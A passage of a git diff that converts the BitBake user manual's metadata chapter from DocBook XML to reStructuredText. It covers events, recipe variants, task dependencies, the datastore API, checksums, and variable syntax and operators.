+datastore is available as "d". In legacy code, you might see "e.data"
+used to get the datastore. However, realize that "e.data" is deprecated
+and you should use "d" going forward.
+
+The context of the datastore is appropriate to the event in question.
+For example, "BuildStarted" and "BuildCompleted" events run before any
+tasks are executed so would be in the global configuration datastore
+namespace. No recipe-specific metadata exists in that namespace. The
+"BuildStarted" and "BuildCompleted" events also run in the main
+cooker/server process rather than any worker context. Thus, any changes
+made to the datastore would be seen by other cooker/server events within
+the current build but not seen outside of that build or in any worker
+context. Task events run in the actual tasks in question consequently
+have recipe-specific and task-specific contents. These events run in the
+worker context and are discarded at the end of task execution.
+
+During a standard build, the following common events might occur. The
+following events are the most common kinds of events that most metadata
+might have an interest in viewing:
+
+- ``bb.event.ConfigParsed()``: Fired when the base configuration; which
+ consists of ``bitbake.conf``, ``base.bbclass`` and any global
+ ``INHERIT`` statements; has been parsed. You can see multiple such
+ events when each of the workers parse the base configuration or if
+ the server changes configuration and reparses. Any given datastore
+ only has one such event executed against it, however. If
+ ```BB_INVALIDCONF`` <#>`__ is set in the datastore by the event
+ handler, the configuration is reparsed and a new event triggered,
+ allowing the metadata to update configuration.
+
+- ``bb.event.HeartbeatEvent()``: Fires at regular time intervals of one
+ second. You can configure the interval time using the
+ ``BB_HEARTBEAT_EVENT`` variable. The event's "time" attribute is the
+ ``time.time()`` value when the event is triggered. This event is
+ useful for activities such as system state monitoring.
+
+- ``bb.event.ParseStarted()``: Fired when BitBake is about to start
+ parsing recipes. This event's "total" attribute represents the number
+ of recipes BitBake plans to parse.
+
+- ``bb.event.ParseProgress()``: Fired as parsing progresses. This
+ event's "current" attribute is the number of recipes parsed as well
+ as the "total" attribute.
+
+- ``bb.event.ParseCompleted()``: Fired when parsing is complete. This
+ event's "cached", "parsed", "skipped", "virtuals", "masked", and
+ "errors" attributes provide statistics for the parsing results.
+
+- ``bb.event.BuildStarted()``: Fired when a new build starts. BitBake
+ fires multiple "BuildStarted" events (one per configuration) when
+ multiple configuration (multiconfig) is enabled.
+
+- ``bb.build.TaskStarted()``: Fired when a task starts. This event's
+ "taskfile" attribute points to the recipe from which the task
+ originates. The "taskname" attribute, which is the task's name,
+ includes the ``do_`` prefix, and the "logfile" attribute point to
+ where the task's output is stored. Finally, the "time" attribute is
+ the task's execution start time.
+
+- ``bb.build.TaskInvalid()``: Fired if BitBake tries to execute a task
+ that does not exist.
+
+- ``bb.build.TaskFailedSilent()``: Fired for setscene tasks that fail
+ and should not be presented to the user verbosely.
+
+- ``bb.build.TaskFailed()``: Fired for normal tasks that fail.
+
+- ``bb.build.TaskSucceeded()``: Fired when a task successfully
+ completes.
+
+- ``bb.event.BuildCompleted()``: Fired when a build finishes.
+
+- ``bb.cooker.CookerExit()``: Fired when the BitBake server/cooker
+ shuts down. This event is usually only seen by the UIs as a sign they
+ should also shutdown.
+
+This next list of example events occur based on specific requests to the
+server. These events are often used to communicate larger pieces of
+information from the BitBake server to other parts of BitBake such as
+user interfaces:
+
+- ``bb.event.TreeDataPreparationStarted()``
+- ``bb.event.TreeDataPreparationProgress()``
+- ``bb.event.TreeDataPreparationCompleted()``
+- ``bb.event.DepTreeGenerated()``
+- ``bb.event.CoreBaseFilesFound()``
+- ``bb.event.ConfigFilePathFound()``
+- ``bb.event.FilesMatchingFound()``
+- ``bb.event.ConfigFilesFound()``
+- ``bb.event.TargetsTreeGenerated()``
+
+.. _variants-class-extension-mechanism:
+
+Variants - Class Extension Mechanism
+====================================
+
+BitBake supports two features that facilitate creating from a single
+recipe file multiple incarnations of that recipe file where all
+incarnations are buildable. These features are enabled through the
+:term:`BBCLASSEXTEND` and :term:`BBVERSIONS` variables.
+
+.. note::
+
+ The mechanism for this class extension is extremely specific to the
+ implementation. Usually, the recipe's :term:`PROVIDES` , :term:`PN` , and
+ :term:`DEPENDS` variables would need to be modified by the extension
+ class. For specific examples, see the OE-Core native , nativesdk , and
+ multilib classes.
+
+- ``BBCLASSEXTEND``: This variable is a space separated list of
+ classes used to "extend" the recipe for each variant. Here is an
+ example that results in a second incarnation of the current recipe
+ being available. This second incarnation will have the "native" class
+ inherited. ::
+
+ BBCLASSEXTEND = "native"
+
+- ``BBVERSIONS``: This variable allows a single recipe to build
+ multiple versions of a project from a single recipe file. You can
+ also specify conditional metadata (using the
+ :term:`OVERRIDES` mechanism) for a single
+ version, or an optionally named range of versions. Here is an
+ example: ::
+
+ BBVERSIONS = "1.0 2.0 git"
+ SRC_URI_git = "git://someurl/somepath.git"
+
+ BBVERSIONS = "1.0.[0-6]:1.0.0+ 1.0.[7-9]:1.0.7+"
+ SRC_URI_append_1.0.7+ = "file://some_patch_which_the_new_versions_need.patch;patch=1"
+
+ The name of the range defaults to the original version of the recipe. For
+ example, in OpenEmbedded, the recipe file ``foo_1.0.0+.bb`` creates a default
+ name range of ``1.0.0+``. This is useful because the range name is not only
+ placed into overrides, but it is also made available for the metadata to use
+ in the variable that defines the base recipe versions for use in ``file://``
+ search paths (:term:`FILESPATH`).
+
+Dependencies
+============
+
+To allow for efficient parallel processing, BitBake handles dependencies
+at the task level. Dependencies can exist both between tasks within a
+single recipe and between tasks in different recipes. Following are
+examples of each:
+
+- For tasks within a single recipe, a recipe's ``do_configure`` task
+ might need to complete before its ``do_compile`` task can run.
+
+- For tasks in different recipes, one recipe's ``do_configure`` task
+ might require another recipe's ``do_populate_sysroot`` task to finish
+ first such that the libraries and headers provided by the other
+ recipe are available.
+
+This section describes several ways to declare dependencies. Remember,
+even though dependencies are declared in different ways, they are all
+simply dependencies between tasks.
+
+.. _dependencies-internal-to-the-bb-file:
+
+Dependencies Internal to the ``.bb`` File
+-----------------------------------------
+
+BitBake uses the ``addtask`` directive to manage dependencies that are
+internal to a given recipe file. You can use the ``addtask`` directive
+to indicate when a task is dependent on other tasks or when other tasks
+depend on that recipe. Here is an example: ::
+
+ addtask printdate after do_fetch before do_build
+
+In this example, the ``do_printdate`` task
+depends on the completion of the ``do_fetch`` task, and the ``do_build``
+task depends on the completion of the ``do_printdate`` task.
+
+.. note::
+
+ For a task to run, it must be a direct or indirect dependency of some
+ other task that is scheduled to run.
+
+ For illustration, here are some examples:
+
+ - The directive ``addtask mytask before do_configure`` causes
+ ``do_mytask`` to run before ``do_configure`` runs. Be aware that
+ ``do_mytask`` still only runs if its :ref:`input
+ checksum <bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)>` has changed since the last time it was
+ run. Changes to the input checksum of ``do_mytask`` also
+ indirectly cause ``do_configure`` to run.
+
+ - The directive ``addtask mytask after do_configure`` by itself
+ never causes ``do_mytask`` to run. ``do_mytask`` can still be run
+ manually as follows: ::
+
+ $ bitbake recipe -c mytask
+
+ Declaring ``do_mytask`` as a dependency of some other task that is
+ scheduled to run also causes it to run. Regardless, the task runs after
+ ``do_configure``.
+
+Build Dependencies
+------------------
+
+BitBake uses the :term:`DEPENDS` variable to manage
+build time dependencies. The ``[deptask]`` varflag for tasks signifies
+the task of each item listed in ``DEPENDS`` that must complete before
+that task can be executed. Here is an example: ::
+
+ do_configure[deptask] = "do_populate_sysroot"
+
+In this example, the ``do_populate_sysroot`` task
+of each item in ``DEPENDS`` must complete before ``do_configure`` can
+execute.
+
+Runtime Dependencies
+--------------------
+
+BitBake uses the :term:`PACKAGES`, :term:`RDEPENDS`, and :term:`RRECOMMENDS`
+variables to manage runtime dependencies.
+
+The ``PACKAGES`` variable lists runtime packages. Each of those packages
+can have ``RDEPENDS`` and ``RRECOMMENDS`` runtime dependencies. The
+``[rdeptask]`` flag for tasks is used to signify the task of each item
+runtime dependency which must have completed before that task can be
+executed. ::
+
+ do_package_qa[rdeptask] = "do_packagedata"
+
+In the previous
+example, the ``do_packagedata`` task of each item in ``RDEPENDS`` must
+have completed before ``do_package_qa`` can execute.
+Although ``RDEPENDS`` contains entries from the
+runtime dependency namespace, BitBake knows how to map them back
+to the build-time dependency namespace, in which the tasks are defined.
+
+Recursive Dependencies
+----------------------
+
+BitBake uses the ``[recrdeptask]`` flag to manage recursive task
+dependencies. BitBake looks through the build-time and runtime
+dependencies of the current recipe, looks through the task's inter-task
+dependencies, and then adds dependencies for the listed task. Once
+BitBake has accomplished this, it recursively works through the
+dependencies of those tasks. Iterative passes continue until all
+dependencies are discovered and added.
+
+The ``[recrdeptask]`` flag is most commonly used in high-level recipes
+that need to wait for some task to finish "globally". For example,
+``image.bbclass`` has the following: ::
+
+ do_rootfs[recrdeptask] += "do_packagedata"
+
+This statement says that the ``do_packagedata`` task of
+the current recipe and all recipes reachable (by way of dependencies)
+from the image recipe must run before the ``do_rootfs`` task can run.
+
+BitBake allows a task to recursively depend on itself by
+referencing itself in the task list: ::
+
+ do_a[recrdeptask] = "do_a do_b"
+
+In the same way as before, this means that the ``do_a``
+and ``do_b`` tasks of the current recipe and all
+recipes reachable (by way of dependencies) from the recipe
+must run before the ``do_a`` task can run. In this
+case BitBake will ignore the current recipe's ``do_a``
+task circular dependency on itself.
+
+Inter-Task Dependencies
+-----------------------
+
+BitBake uses the ``[depends]`` flag in a more generic form to manage
+inter-task dependencies. This more generic form allows for
+inter-dependency checks for specific tasks rather than checks for the
+data in ``DEPENDS``. Here is an example: ::
+
+ do_patch[depends] = "quilt-native:do_populate_sysroot"
+
+In this example, the ``do_populate_sysroot`` task of the target ``quilt-native``
+must have completed before the ``do_patch`` task can execute.
+
+The ``[rdepends]`` flag works in a similar way but takes targets in the
+runtime namespace instead of the build-time dependency namespace.
+
+Functions You Can Call From Within Python
+=========================================
+
+BitBake provides many functions you can call from within Python
+functions. This section lists the most commonly used functions, and
+mentions where to find others.
+
+Functions for Accessing Datastore Variables
+-------------------------------------------
+
+It is often necessary to access variables in the BitBake datastore using
+Python functions. The BitBake datastore has an API that allows you this
+access. Here is a list of available operations:
+
+.. list-table::
+ :widths: auto
+ :header-rows: 1
+
+ * - *Operation*
+ - *Description*
+ * - ``d.getVar("X", expand)``
+ - Returns the value of variable "X". Using "expand=True" expands the
+ value. Returns "None" if the variable "X" does not exist.
+ * - ``d.setVar("X", "value")``
+ - Sets the variable "X" to "value"
+ * - ``d.appendVar("X", "value")``
+ - Adds "value" to the end of the variable "X". Acts like ``d.setVar("X",
+ "value")`` if the variable "X" does not exist.
+ * - ``d.prependVar("X", "value")``
+ - Adds "value" to the start of the variable "X". Acts like
+ ``d.setVar("X","value")`` if the variable "X" does not exist.
+ * - ``d.delVar("X")``
+ - Deletes the variable "X" from the datastore. Does nothing if the variable
+ "X" does not exist.
+ * - ``d.renameVar("X", "Y")``
+ - Renames the variable "X" to "Y". Does nothing if the variable "X" does
+ not exist.
+ * - ``d.getVarFlag("X", flag, expand)``
+ - Returns the value of variable "X". Using "expand=True" expands the
+ value. Returns "None" if either the variable "X" or the named flag does
+ not exist.
+ * - ``d.setVarFlag("X", flag, "value")``
+ - Sets the named flag for variable "X" to "value".
+ * - ``d.appendVarFlag("X", flag, "value")``
+ - Appends "value" to the named flag on the variable "X". Acts like
+ ``d.setVarFlag("X", flag, "value")`` if the named flag does not exist.
+ * - ``d.prependVarFlag("X", flag, "value")``
+ - Prepends "value" to the named flag on the variable "X". Acts like
+ ``d.setVarFlag("X", flag, "value")`` if the named flag does not exist.
+ * - ``d.delVarFlag("X", flag)``
+ - Deletes the named flag on the variable "X" from the datastore.
+ * - ``d.setVarFlags("X", flagsdict)``
+ - Sets the flags specified in the ``flagsdict()``
+ parameter. ``setVarFlags`` does not clear previous flags. Think of this
+ operation as ``addVarFlags``.
+ * - ``d.getVarFlags("X")``
+ - Returns a ``flagsdict`` of the flags for the variable "X". Returns "None"
+ if the variable "X" does not exist.
+ * - ``d.delVarFlags("X")``
+ - Deletes all the flags for the variable "X". Does nothing if the variable
+ "X" does not exist.
+ * - ``d.expand(expression)``
+ - Expands variable references in the specified string
+ expression. References to variables that do not exist are left as is. For
+ example, ``d.expand("foo ${X}")`` expands to the literal string "foo
+ ${X}" if the variable "X" does not exist.
+
+Other Functions
+---------------
+
+You can find many other functions that can be called from Python by
+looking at the source code of the ``bb`` module, which is in
+``bitbake/lib/bb``. For example, ``bitbake/lib/bb/utils.py`` includes
+the commonly used functions ``bb.utils.contains()`` and
+``bb.utils.mkdirhier()``, which come with docstrings.
+
+Task Checksums and Setscene
+===========================
+
+BitBake uses checksums (or signatures) along with the setscene to
+determine if a task needs to be run. This section describes the process.
+To help understand how BitBake does this, the section assumes an
+OpenEmbedded metadata-based example.
+
+These checksums are stored in :term:`STAMP`. You can
+examine the checksums using the following BitBake command: ::
+
+ $ bitbake-dumpsigs
+
+This command returns the signature data in a readable
+format that allows you to examine the inputs used when the OpenEmbedded
+build system generates signatures. For example, using
+``bitbake-dumpsigs`` allows you to examine the ``do_compile`` task's
+"sigdata" for a C application (e.g. ``bash``). Running the command also
+reveals that the "CC" variable is part of the inputs that are hashed.
+Any changes to this variable would invalidate the stamp and cause the
+``do_compile`` task to run.
+
+The following list describes related variables:
+
+- :term:`BB_HASHCHECK_FUNCTION`:
+ Specifies the name of the function to call during the "setscene" part
+ of the task's execution in order to validate the list of task hashes.
+
+- :term:`BB_SETSCENE_DEPVALID`:
+ Specifies a function BitBake calls that determines whether BitBake
+ requires a setscene dependency to be met.
+
+- :term:`BB_SETSCENE_VERIFY_FUNCTION2`:
+ Specifies a function to call that verifies the list of planned task
+ execution before the main task execution happens.
+
+- :term:`BB_STAMP_POLICY`: Defines the mode
+ for comparing timestamps of stamp files.
+
+- :term:`BB_STAMP_WHITELIST`: Lists stamp
+ files that are looked at when the stamp policy is "whitelist".
+
+- :term:`BB_TASKHASH`: Within an executing task,
+ this variable holds the hash of the task as returned by the currently
+ enabled signature generator.
+
+- :term:`STAMP`: The base path to create stamp files.
+
+- :term:`STAMPCLEAN`: Again, the base path to
+ create stamp files but can use wildcards for matching a range of
+ files for clean operations.
+
+Wildcard Support in Variables
+=============================
+
+Support for wildcard use in variables varies depending on the context in
+which it is used. For example, some variables and file names allow
+limited use of wildcards through the "``%``" and "``*``" characters.
+Other variables or names support Python's
+`glob <https://docs.python.org/3/library/glob.html>`_ syntax,
+`fnmatch <https://docs.python.org/3/library/fnmatch.html#module-fnmatch>`_
+syntax, or
+`Regular Expression (re) <https://docs.python.org/3/library/re.html>`_
+syntax.
+
+For variables that have wildcard suport, the documentation describes
+which form of wildcard, its use, and its limitations.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml
deleted file mode 100644
index 0ca5321618..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-metadata.xml
+++ /dev/null
@@ -1,2862 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter id="bitbake-user-manual-metadata">
- <title>Syntax and Operators</title>
-
- <para>
- BitBake files have their own syntax.
- The syntax has similarities to several
- other languages but also has some unique features.
- This section describes the available syntax and operators
- as well as provides examples.
- </para>
-
- <section id='basic-syntax'>
- <title>Basic Syntax</title>
-
- <para>
- This section provides some basic syntax examples.
- </para>
-
- <section id='basic-variable-setting'>
- <title>Basic Variable Setting</title>
-
- <para>
- The following example sets <filename>VARIABLE</filename> to
- "value".
- This assignment occurs immediately as the statement is parsed.
- It is a "hard" assignment.
- <literallayout class='monospaced'>
- VARIABLE = "value"
- </literallayout>
- As expected, if you include leading or trailing spaces as part of
- an assignment, the spaces are retained:
- <literallayout class='monospaced'>
- VARIABLE = " value"
- VARIABLE = "value "
- </literallayout>
- Setting <filename>VARIABLE</filename> to "" sets it to an empty string,
- while setting the variable to " " sets it to a blank space
- (i.e. these are not the same values).
- <literallayout class='monospaced'>
- VARIABLE = ""
- VARIABLE = " "
- </literallayout>
- </para>
-
- <para>
- You can use single quotes instead of double quotes
- when setting a variable's value.
- Doing so allows you to use values that contain the double
- quote character:
- <literallayout class='monospaced'>
- VARIABLE = 'I have a " in my value'
- </literallayout>
- <note>
- Unlike in Bourne shells, single quotes work identically
- to double quotes in all other ways.
- They do not suppress variable expansions.
- </note>
- </para>
- </section>
-
- <section id='modifying-existing-variables'>
- <title>Modifying Existing Variables</title>
-
- <para>
- Sometimes you need to modify existing variables.
- Following are some cases where you might find you want to
- modify an existing variable:
- <itemizedlist>
- <listitem><para>
- Customize a recipe that uses the variable.
- </para></listitem>
- <listitem><para>
- Change a variable's default value used in a
- <filename>*.bbclass</filename> file.
- </para></listitem>
- <listitem><para>
- Change the variable in a <filename>*.bbappend</filename>
- file to override the variable in the original recipe.
- </para></listitem>
- <listitem><para>
- Change the variable in a configuration file so that the
- value overrides an existing configuration.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Changing a variable value can sometimes depend on how the
- value was originally assigned and also on the desired
- intent of the change.
- In particular, when you append a value to a variable that
- has a default value, the resulting value might not be what
- you expect.
- In this case, the value you provide might replace the value
- rather than append to the default value.
- </para>
-
- <para>
- If after you have changed a variable's value and something
- unexplained occurs, you can use BitBake to check the actual
- value of the suspect variable.
- You can make these checks for both configuration and recipe
- level changes:
- <itemizedlist>
- <listitem><para>
- For configuration changes, use the following:
- <literallayout class='monospaced'>
- $ bitbake -e
- </literallayout>
- This command displays variable values after the
- configuration files (i.e. <filename>local.conf</filename>,
- <filename>bblayers.conf</filename>,
- <filename>bitbake.conf</filename> and so forth) have
- been parsed.
- <note>
- Variables that are exported to the environment are
- preceded by the string "export" in the command's
- output.
- </note>
- </para></listitem>
- <listitem><para>
- For recipe changes, use the following:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>recipe</replaceable> -e | grep VARIABLE="
- </literallayout>
- This command checks to see if the variable actually
- makes it into a specific recipe.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='line-joining'>
- <title>Line Joining</title>
-
- <para>
- Outside of
- <link linkend='functions'>functions</link>, BitBake joins
- any line ending in a backslash character ("\")
- with the following line before parsing statements.
- The most common use for the "\" character is to split variable
- assignments over multiple lines, as in the following example:
- <literallayout class='monospaced'>
- FOO = "bar \
- baz \
- qaz"
- </literallayout>
- Both the "\" character and the newline character
- that follow it are removed when joining lines.
- Thus, no newline characters end up in the value of
- <filename>FOO</filename>.
- </para>
-
- <para>
- Consider this additional example where the two
- assignments both assign "barbaz" to
- <filename>FOO</filename>:
- <literallayout class='monospaced'>
- FOO = "barbaz"
-
- FOO = "bar\
- baz"
- </literallayout>
- <note>
- BitBake does not interpret escape sequences like
- "\n" in variable values.
- For these to have an effect, the value must be passed
- to some utility that interprets escape sequences,
- such as <filename>printf</filename> or
- <filename>echo -n</filename>.
- </note>
- </para>
- </section>
-
- <section id='variable-expansion'>
- <title>Variable Expansion</title>
-
- <para>
- Variables can reference the contents of other variables
- using a syntax that is similar to variable expansion in
- Bourne shells.
- The following assignments
- result in A containing "aval" and B evaluating to "preavalpost".
- <literallayout class='monospaced'>
- A = "aval"
- B = "pre${A}post"
- </literallayout>
- <note>
- Unlike in Bourne shells, the curly braces are mandatory:
- Only <filename>${FOO}</filename> and not
- <filename>$FOO</filename> is recognized as an expansion of
- <filename>FOO</filename>.
- </note>
- The "=" operator does not immediately expand variable
- references in the right-hand side.
- Instead, expansion is deferred until the variable assigned to
- is actually used.
- The result depends on the current values of the referenced
- variables.
- The following example should clarify this behavior:
- <literallayout class='monospaced'>
- A = "${B} baz"
- B = "${C} bar"
- C = "foo"
- *At this point, ${A} equals "foo bar baz"*
- C = "qux"
- *At this point, ${A} equals "qux bar baz"*
- B = "norf"
- *At this point, ${A} equals "norf baz"*
- </literallayout>
- Contrast this behavior with the
- <link linkend='immediate-variable-expansion'>immediate variable expansion</link>
- operator (i.e. ":=").
- </para>
-
- <para>
- If the variable expansion syntax is used on a variable that
- does not exist, the string is kept as is.
- For example, given the following assignment,
- <filename>BAR</filename> expands to the literal string
- "${FOO}" as long as <filename>FOO</filename> does not exist.
- <literallayout class='monospaced'>
- BAR = "${FOO}"
- </literallayout>
- </para>
- </section>
-
- <section id='setting-a-default-value'>
- <title>Setting a default value (?=)</title>
-
- <para>
- You can use the "?=" operator to achieve a "softer" assignment
- for a variable.
- This type of assignment allows you to define a variable if it
- is undefined when the statement is parsed, but to leave the
- value alone if the variable has a value.
- Here is an example:
- <literallayout class='monospaced'>
- A ?= "aval"
- </literallayout>
- If <filename>A</filename> is set at the time this statement is parsed,
- the variable retains its value.
- However, if <filename>A</filename> is not set,
- the variable is set to "aval".
- <note>
- This assignment is immediate.
- Consequently, if multiple "?=" assignments
- to a single variable exist, the first of those ends up getting
- used.
- </note>
- </para>
- </section>
-
- <section id='setting-a-weak-default-value'>
- <title>Setting a weak default value (??=)</title>
-
- <para>
- It is possible to use a "weaker" assignment than in the
- previous section by using the "??=" operator.
- This assignment behaves identical to "?=" except that the
- assignment is made at the end of the parsing process rather
- than immediately.
- Consequently, when multiple "??=" assignments exist, the last
- one is used.
- Also, any "=" or "?=" assignment will override the value set with
- "??=".
- Here is an example:
- <literallayout class='monospaced'>
- A ??= "somevalue"
- A ??= "someothervalue"
- </literallayout>
- If <filename>A</filename> is set before the above statements are parsed,
- the variable retains its value.
- If <filename>A</filename> is not set,
- the variable is set to "someothervalue".
- </para>
-
- <para>
- Again, this assignment is a "lazy" or "weak" assignment
- because it does not occur until the end
- of the parsing process.
- </para>
- </section>
-
- <section id='immediate-variable-expansion'>
- <title>Immediate variable expansion (:=)</title>
-
- <para>
- The ":=" operator results in a variable's
- contents being expanded immediately,
- rather than when the variable is actually used:
- <literallayout class='monospaced'>
- T = "123"
- A := "test ${T}"
- T = "456"
- B := "${T} ${C}"
- C = "cval"
- C := "${C}append"
- </literallayout>
- In this example, <filename>A</filename> contains
- "test 123", even though the final value of <filename>T</filename>
- is "456".
- The variable <filename>B</filename> will end up containing "456 cvalappend".
- This is because references to undefined variables are preserved as is
- during (immediate)expansion. This is in contrast to GNU Make, where undefined
- variables expand to nothing.
- The variable <filename>C</filename>
- contains "cvalappend" since <filename>${C}</filename> immediately
- expands to "cval".
- </para>
- </section>
-
- <section id='appending-and-prepending'>
- <title>Appending (+=) and prepending (=+) With Spaces</title>
-
- <para>
- Appending and prepending values is common and can be accomplished
- using the "+=" and "=+" operators.
- These operators insert a space between the current
- value and prepended or appended value.
- </para>
-
- <para>
- These operators take immediate effect during parsing.
- Here are some examples:
- <literallayout class='monospaced'>
- B = "bval"
- B += "additionaldata"
- C = "cval"
- C =+ "test"
- </literallayout>
- The variable <filename>B</filename> contains
- "bval additionaldata" and <filename>C</filename>
- contains "test cval".
- </para>
- </section>
-
- <section id='appending-and-prepending-without-spaces'>
- <title>Appending (.=) and Prepending (=.) Without Spaces</title>
-
- <para>
- If you want to append or prepend values without an
- inserted space, use the ".=" and "=." operators.
- </para>
-
- <para>
- These operators take immediate effect during parsing.
- Here are some examples:
- <literallayout class='monospaced'>
- B = "bval"
- B .= "additionaldata"
- C = "cval"
- C =. "test"
- </literallayout>
- The variable <filename>B</filename> contains
- "bvaladditionaldata" and
- <filename>C</filename> contains "testcval".
- </para>
- </section>
-
- <section id='appending-and-prepending-override-style-syntax'>
- <title>Appending and Prepending (Override Style Syntax)</title>
-
- <para>
- You can also append and prepend a variable's value
- using an override style syntax.
- When you use this syntax, no spaces are inserted.
- </para>
-
- <para>
- These operators differ from the ":=", ".=", "=.", "+=", and "=+"
- operators in that their effects are applied at variable
- expansion time rather than being immediately applied.
- Here are some examples:
- <literallayout class='monospaced'>
- B = "bval"
- B_append = " additional data"
- C = "cval"
- C_prepend = "additional data "
- D = "dval"
- D_append = "additional data"
- </literallayout>
- The variable <filename>B</filename> becomes
- "bval additional data" and <filename>C</filename> becomes
- "additional data cval".
- The variable <filename>D</filename> becomes
- "dvaladditional data".
- <note>
- You must control all spacing when you use the
- override syntax.
- </note>
- </para>
-
- <para>
- It is also possible to append and prepend to shell
- functions and BitBake-style Python functions.
- See the
- "<link linkend='shell-functions'>Shell Functions</link>" and
- "<link linkend='bitbake-style-python-functions'>BitBake-Style Python Functions</link>
- sections for examples.
- </para>
- </section>
-
- <section id='removing-override-style-syntax'>
- <title>Removal (Override Style Syntax)</title>
-
- <para>
- You can remove values from lists using the removal
- override style syntax.
- Specifying a value for removal causes all occurrences of that
- value to be removed from the variable.
- </para>
-
- <para>
- When you use this syntax, BitBake expects one or more strings.
- Surrounding spaces and spacing are preserved.
- Here is an example:
- <literallayout class='monospaced'>
- FOO = "123 456 789 123456 123 456 123 456"
- FOO_remove = "123"
- FOO_remove = "456"
- FOO2 = " abc def ghi abcdef abc def abc def def"
- FOO2_remove = " \
- def \
- abc \
- ghi \
- "
- </literallayout>
- The variable <filename>FOO</filename> becomes
- "&nbsp;&nbsp;789&nbsp;123456&nbsp;&nbsp;&nbsp;&nbsp;"
- and <filename>FOO2</filename> becomes
- "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;abcdef&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".
- </para>
-
- <para>
- Like "_append" and "_prepend", "_remove"
- is applied at variable expansion time.
- </para>
- </section>
-
- <section id='override-style-operation-advantages'>
- <title>Override Style Operation Advantages</title>
-
- <para>
- An advantage of the override style operations
- "_append", "_prepend", and "_remove" as compared to the
- "+=" and "=+" operators is that the override style
- operators provide guaranteed operations.
- For example, consider a class <filename>foo.bbclass</filename>
- that needs to add the value "val" to the variable
- <filename>FOO</filename>, and a recipe that uses
- <filename>foo.bbclass</filename> as follows:
- <literallayout class='monospaced'>
- inherit foo
-
- FOO = "initial"
- </literallayout>
- If <filename>foo.bbclass</filename> uses the "+=" operator,
- as follows, then the final value of <filename>FOO</filename>
- will be "initial", which is not what is desired:
- <literallayout class='monospaced'>
- FOO += "val"
- </literallayout>
- If, on the other hand, <filename>foo.bbclass</filename>
- uses the "_append" operator, then the final value of
- <filename>FOO</filename> will be "initial val", as intended:
- <literallayout class='monospaced'>
- FOO_append = " val"
- </literallayout>
- <note>
- It is never necessary to use "+=" together with "_append".
- The following sequence of assignments appends "barbaz" to
- <filename>FOO</filename>:
- <literallayout class='monospaced'>
- FOO_append = "bar"
- FOO_append = "baz"
- </literallayout>
- The only effect of changing the second assignment in the
- previous example to use "+=" would be to add a space before
- "baz" in the appended value (due to how the "+=" operator
- works).
- </note>
- Another advantage of the override style operations is that
- you can combine them with other overrides as described in the
- "<link linkend='conditional-syntax-overrides'>Conditional Syntax (Overrides)</link>"
- section.
- </para>
- </section>
-
- <section id='variable-flag-syntax'>
- <title>Variable Flag Syntax</title>
-
- <para>
- Variable flags are BitBake's implementation of variable properties
- or attributes.
- It is a way of tagging extra information onto a variable.
- You can find more out about variable flags in general in the
- "<link linkend='variable-flags'>Variable Flags</link>"
- section.
- </para>
-
- <para>
- You can define, append, and prepend values to variable flags.
- All the standard syntax operations previously mentioned work
- for variable flags except for override style syntax
- (i.e. "_prepend", "_append", and "_remove").
- </para>
-
- <para>
- Here are some examples showing how to set variable flags:
- <literallayout class='monospaced'>
- FOO[a] = "abc"
- FOO[b] = "123"
- FOO[a] += "456"
- </literallayout>
- The variable <filename>FOO</filename> has two flags:
- <filename>[a]</filename> and <filename>[b]</filename>.
- The flags are immediately set to "abc" and "123", respectively.
- The <filename>[a]</filename> flag becomes "abc 456".
- </para>
-
- <para>
- No need exists to pre-define variable flags.
- You can simply start using them.
- One extremely common application
- is to attach some brief documentation to a BitBake variable as
- follows:
- <literallayout class='monospaced'>
- CACHE[doc] = "The directory holding the cache of the metadata."
- </literallayout>
- </para>
- </section>
-
- <section id='inline-python-variable-expansion'>
- <title>Inline Python Variable Expansion</title>
-
- <para>
- You can use inline Python variable expansion to
- set variables.
- Here is an example:
- <literallayout class='monospaced'>
- DATE = "${@time.strftime('%Y%m%d',time.gmtime())}"
- </literallayout>
- This example results in the <filename>DATE</filename>
- variable being set to the current date.
- </para>
-
- <para>
- Probably the most common use of this feature is to extract
- the value of variables from BitBake's internal data dictionary,
- <filename>d</filename>.
- The following lines select the values of a package name
- and its version number, respectively:
- <literallayout class='monospaced'>
- PN = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[0] or 'defaultpkgname'}"
- PV = "${@bb.parse.BBHandler.vars_from_file(d.getVar('FILE', False),d)[1] or '1.0'}"
- </literallayout>
- <note>
- Inline Python expressions work just like variable expansions
- insofar as the "=" and ":=" operators are concerned.
- Given the following assignment, <filename>foo()</filename>
- is called each time <filename>FOO</filename> is expanded:
- <literallayout class='monospaced'>
- FOO = "${@foo()}"
- </literallayout>
- Contrast this with the following immediate assignment, where
- <filename>foo()</filename> is only called once, while the
- assignment is parsed:
- <literallayout class='monospaced'>
- FOO := "${@foo()}"
- </literallayout>
- </note>
- For a different way to set variables with Python code during
- parsing, see the
- "<link linkend='anonymous-python-functions'>Anonymous Python Functions</link>"
- section.
- </para>
- </section>
-
- <section id='unsetting-variables'>
- <title>Unsetting variables</title>
-
- <para>
- It is possible to completely remove a variable or a variable flag
- from BitBake's internal data dictionary by using the "unset" keyword.
- Here is an example:
- <literallayout class='monospaced'>
- unset DATE
- unset do_fetch[noexec]
- </literallayout>
- These two statements remove the <filename>DATE</filename> and the
- <filename>do_fetch[noexec]</filename> flag.
- </para>
-
- </section>
-
- <section id='providing-pathnames'>
- <title>Providing Pathnames</title>
-
- <para>
- When specifying pathnames for use with BitBake,
- do not use the tilde ("~") character as a shortcut
- for your home directory.
- Doing so might cause BitBake to not recognize the
- path since BitBake does not expand this character in
- the same way a shell would.
- </para>
-
- <para>
- Instead, provide a fuller path as the following
- example illustrates:
- <literallayout class='monospaced'>
- BBLAYERS ?= " \
- /home/scott-lenovo/LayerA \
- "
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='exporting-variables-to-the-environment'>
